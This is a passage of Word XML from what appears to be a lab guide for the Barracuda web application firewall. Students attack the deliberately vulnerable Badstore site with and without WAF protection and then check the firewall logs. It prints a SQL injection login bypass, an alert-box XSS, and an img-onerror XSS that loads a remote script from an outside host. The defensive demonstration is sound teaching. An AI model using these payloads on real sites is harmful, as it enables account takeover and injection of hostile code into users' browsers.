    <w:p w14:paraId="5438A479" w14:textId="1C0A89A8" w:rsidR="0062648F" w:rsidRDefault="0062648F" w:rsidP="0062648F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="768"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B4FA162" wp14:editId="18EF2504">
            <wp:extent cx="3149609" cy="1554615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="651647086" name="Picture 65164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64708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49609" cy="1554615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0C1C02" w14:textId="77777777" w:rsidR="00C47C98" w:rsidRDefault="00C47C98" w:rsidP="0062648F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="768"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7041C7F3" w14:textId="21DE347C" w:rsidR="00025C37" w:rsidRPr="00227BBB" w:rsidRDefault="00062807" w:rsidP="00227BBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Thi</w:t>
      </w:r>
      <w:r w:rsidR="00025C37" w:rsidRPr="00025C37">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s SQL Injection will succeed, and you will see near the top of the web page that you are logged in as the “Test User” without knowing their real email address or passwor</w:t>
      </w:r>
      <w:r w:rsidR="00227BBB">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidR="00025C37" w:rsidRPr="00227BBB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5357C3" w14:textId="315AB360" w:rsidR="00324D14" w:rsidRDefault="00324D14" w:rsidP="00324D14">
      <w:pPr>
        <w:spacing w:before="240" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA03420" wp14:editId="3FFCB00D">
            <wp:extent cx="1868129" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1048885455" name="Picture 1048885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885455"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1868129" cy="542925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="013996CD" w14:textId="3C9824B9" w:rsidR="00324D14" w:rsidRPr="00227BBB" w:rsidRDefault="005C2C76" w:rsidP="00227BBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C76">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>This proves a SQL injection vulnerability exists on this site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7ABD73" w14:textId="31C0C75C" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00B2367D"/>
    <w:p w14:paraId="4BACE139" w14:textId="4AE0C79C" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00B2367D"/>
    <w:p w14:paraId="32C47E7D" w14:textId="4BFE5EB4" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00B2367D">
      <w:r>
        <w:t>Now test the same request with the WAF protecting the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187DCE7D" w14:textId="2BE2BF2A" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00A540DB"/>
    <w:p w14:paraId="24B38296" w14:textId="6EA1C038" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00A540DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On browser tab #2 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E7AA5">
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, protected) </w:t>
      </w:r>
      <w:r w:rsidR="00D238BF" w:rsidRPr="00062807">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Click Login / Register and enter ' or 1=1 # for the email address, then click Login</w:t>
      </w:r>
      <w:r w:rsidR="00D238BF" w:rsidRPr="00A540DB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="SimSun" w:hAnsi="Calibri" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E860A7" w14:textId="726987C6" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00B2367D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00A540DB">
        <w:t>website is protected by the WAF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0496C485" w14:textId="26FDD0D9" w:rsidR="0079023E" w:rsidRDefault="0079023E" w:rsidP="0079023E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="007A33A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7241E6F3" wp14:editId="6545FB7A">
            <wp:extent cx="3648974" cy="3317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9710" cy="339065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CC8267" w14:textId="77777777" w:rsidR="00B2367D" w:rsidRDefault="00B2367D" w:rsidP="00B2367D"/>
    <w:p w14:paraId="67FE8F5E" w14:textId="3FCC09CC" w:rsidR="00042F22" w:rsidRDefault="00042F22" w:rsidP="00B2367D">
      <w:r>
        <w:t xml:space="preserve">To see this entry in the WAF logs, go back to tab #1 and click BASIC &gt; Web Firewall Logs. There will be an entry </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7197C6" w14:textId="1FA1759C" w:rsidR="00042F22" w:rsidRDefault="00077428" w:rsidP="00B2367D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1029ADF4" wp14:editId="71A3EC14">
            <wp:extent cx="5943600" cy="6483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48335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="225CC07B" w14:textId="77777777" w:rsidR="00077428" w:rsidRDefault="00077428" w:rsidP="00B2367D"/>
    <w:p w14:paraId="24F21D77" w14:textId="46313FCB" w:rsidR="00077428" w:rsidRDefault="00077428" w:rsidP="00B2367D">
      <w:r>
        <w:t xml:space="preserve">Click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00077428">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> button (new window opens) to see additional information about this request and a description of the attack type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3520E9B7" w14:textId="3A139975" w:rsidR="00724ADD" w:rsidRDefault="00724ADD" w:rsidP="006E364F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc76995347"/>
      <w:r>
        <w:t xml:space="preserve">Test </w:t>
      </w:r>
      <w:r w:rsidR="008E7AA5">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="006E364F">
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="71A1CF6B" w14:textId="679F2E49" w:rsidR="00724ADD" w:rsidRDefault="00724ADD" w:rsidP="00392965"/>
    <w:p w14:paraId="60BF8E72" w14:textId="7A941248" w:rsidR="00724ADD" w:rsidRDefault="00724ADD" w:rsidP="00392965">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test for the presence of</w:t>
      </w:r>
      <w:r w:rsidR="006E364F">
        <w:t xml:space="preserve"> an XSS vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813617E" w14:textId="05E38300" w:rsidR="006E364F" w:rsidRDefault="006E364F" w:rsidP="006E364F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On browser tab #4 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009B32A7">
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, unprotected) click </w:t>
      </w:r>
      <w:r w:rsidR="003C0DB4">
        <w:t>the Sign Guestbook link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCE8040" w14:textId="24C2D7B9" w:rsidR="006E364F" w:rsidRDefault="00106BBF" w:rsidP="006E364F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fill in a random</w:t>
      </w:r>
      <w:r w:rsidR="00934ECF">
        <w:t xml:space="preserve"> name and email address</w:t>
      </w:r>
      <w:r w:rsidR="001A0342">
        <w:t>. For the comment, copy and paste this value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABBD1E8" w14:textId="494DD5EE" w:rsidR="001A0342" w:rsidRDefault="007F69A0" w:rsidP="001A0342">
      <w:pPr>
        <w:ind w:left="408"/>
      </w:pPr>
      <w:r w:rsidRPr="007F69A0">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F69A0">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F69A0">
        <w:t>'go to terriblestore.com for lower prices!');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C6C103" w14:textId="752EB641" w:rsidR="006E364F" w:rsidRDefault="00C03241" w:rsidP="00FA4A86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidR="00C40226">
        <w:t>Add Entry. You will see a popup like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4778873C" w14:textId="4B25280F" w:rsidR="006E364F" w:rsidRDefault="006E364F" w:rsidP="006E364F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The search field will look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A515E5" w14:textId="59717D68" w:rsidR="00C40226" w:rsidRDefault="007C5776" w:rsidP="007C5776">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="768"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71E4EFB2" wp14:editId="5ECD8B50">
            <wp:extent cx="1762299" cy="63467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5058" cy="635667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6A4EF" w14:textId="318DC351" w:rsidR="006E364F" w:rsidRDefault="006E364F" w:rsidP="006E364F"/>
    <w:p w14:paraId="0AF6F987" w14:textId="77777777" w:rsidR="00494CEA" w:rsidRDefault="00494CEA" w:rsidP="00494CEA">
      <w:r>
        <w:t>Now test the same request with the WAF protecting the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB22EF" w14:textId="268B6B78" w:rsidR="006E364F" w:rsidRDefault="006E364F" w:rsidP="006E364F"/>
    <w:p w14:paraId="4DA6AC7D" w14:textId="7E9FED22" w:rsidR="00215ED7" w:rsidRDefault="00215ED7" w:rsidP="00215ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On browser tab #2 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009B32A7">
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, protected) </w:t>
      </w:r>
      <w:r w:rsidR="00494CEA">
        <w:t>click the Sign Guestbook link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4818D" w14:textId="28B36C79" w:rsidR="00215ED7" w:rsidRDefault="006C760E" w:rsidP="00215ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fill in the same values as before, then click Add Entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093CB68" w14:textId="42C76CD6" w:rsidR="0079023E" w:rsidRDefault="0079023E" w:rsidP="00215ED7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Once again, the website is protected by the WAF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632D6AB8" w14:textId="028EB9A2" w:rsidR="0079023E" w:rsidRDefault="0079023E" w:rsidP="0079023E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="007A33A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38742151" wp14:editId="5A2EF35F">
            <wp:extent cx="3648974" cy="331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9710" cy="339065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8E5303" w14:textId="77777777" w:rsidR="006E364F" w:rsidRPr="00286DC0" w:rsidRDefault="006E364F" w:rsidP="00392965"/>
    <w:p w14:paraId="1F4741D4" w14:textId="77777777" w:rsidR="0018295D" w:rsidRDefault="0018295D" w:rsidP="0018295D">
      <w:r>
        <w:t xml:space="preserve">To see this entry in the WAF logs, go back to tab #1 and click BASIC &gt; Web Firewall Logs. There will be an entry </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB514BF" w14:textId="3A8D65BD" w:rsidR="0018295D" w:rsidRDefault="0018295D" w:rsidP="0018295D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6A8BA8" wp14:editId="433A9C5D">
            <wp:extent cx="5943600" cy="6915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91515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE995BD" w14:textId="77777777" w:rsidR="0018295D" w:rsidRDefault="0018295D" w:rsidP="0018295D"/>
    <w:p w14:paraId="68224FE5" w14:textId="77777777" w:rsidR="0018295D" w:rsidRDefault="0018295D" w:rsidP="0018295D">
      <w:r>
        <w:t xml:space="preserve">Click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00077428">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> button (new window opens) to see additional information about this request and a description of the attack type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D8E28D" w14:textId="65C6130B" w:rsidR="003650CA" w:rsidRDefault="00BA705E" w:rsidP="00BA705E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2445"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4BF28F" w14:textId="5929ED8E" w:rsidR="00BA705E" w:rsidRDefault="00D80016" w:rsidP="00BA705E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2445"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To illustrate the potential dangers of XSS attacks, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0068314B">
        <w:t>let’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0068314B">
        <w:t xml:space="preserve"> perform another one:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F317E8B" w14:textId="77777777" w:rsidR="0068314B" w:rsidRDefault="0068314B" w:rsidP="0068314B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On browser tab #4 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, unprotected) click the Sign Guestbook link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0959A" w14:textId="77777777" w:rsidR="0068314B" w:rsidRDefault="0068314B" w:rsidP="0068314B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Fill in a random name and email address. For the comment, copy and paste this value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55081F91" w14:textId="0CF24CCE" w:rsidR="0068314B" w:rsidRPr="00AD6226" w:rsidRDefault="007D0004" w:rsidP="00A904F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=1 onerror="s=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>('script');s.src='</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6226">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AFE9B9" w14:textId="55696FE2" w:rsidR="0068314B" w:rsidRDefault="0068314B" w:rsidP="0068314B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click Add Entry. </w:t>
      </w:r>
      <w:r w:rsidR="00AD6226">
        <w:t>The result</w:t>
      </w:r>
      <w:r w:rsidR="002916EE">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00082AAA">
        <w:t xml:space="preserve">ng output in the browser window illustrates </w:t>
      </w:r>
      <w:r w:rsidR="006B6BEC">
        <w:t>just how dangerous vulnerabilities can be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384776A3" w14:textId="72D4B721" w:rsidR="00FD0891" w:rsidRDefault="00FD0891" w:rsidP="0068314B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click the browser back button to return to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2425392C" w14:textId="77777777" w:rsidR="006B6BEC" w:rsidRDefault="006B6BEC" w:rsidP="006B6BEC"/>
    <w:p w14:paraId="1A4AF464" w14:textId="782F8A64" w:rsidR="006B6BEC" w:rsidRDefault="006B6BEC" w:rsidP="006B6BEC">
      <w:r>
        <w:t xml:space="preserve">Perform the same request with the WAF on browser tab #2 and again you will see that the website </w:t>
      </w:r>
      <w:r w:rsidR="0086110C">
        <w:t>is protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C10667" w14:textId="77777777" w:rsidR="0086110C" w:rsidRDefault="0086110C" w:rsidP="006B6BEC"/>
    <w:p w14:paraId="6ABCCF5F" w14:textId="0AD1E88E" w:rsidR="0086110C" w:rsidRDefault="00F26E89" w:rsidP="00F26E89">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc76995348"/>
      <w:r>
        <w:t>Test 4: Removing a False Positive</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0FBDDA20" w14:textId="77777777" w:rsidR="00F26E89" w:rsidRDefault="00F26E89" w:rsidP="006B6BEC"/>
    <w:p w14:paraId="390DD8AA" w14:textId="3FEBC194" w:rsidR="00F26E89" w:rsidRDefault="00D109D3" w:rsidP="006B6BEC">
      <w:r>
        <w:t xml:space="preserve">The Barracuda WAF has strict-by-default web security. In some </w:t>
      </w:r>
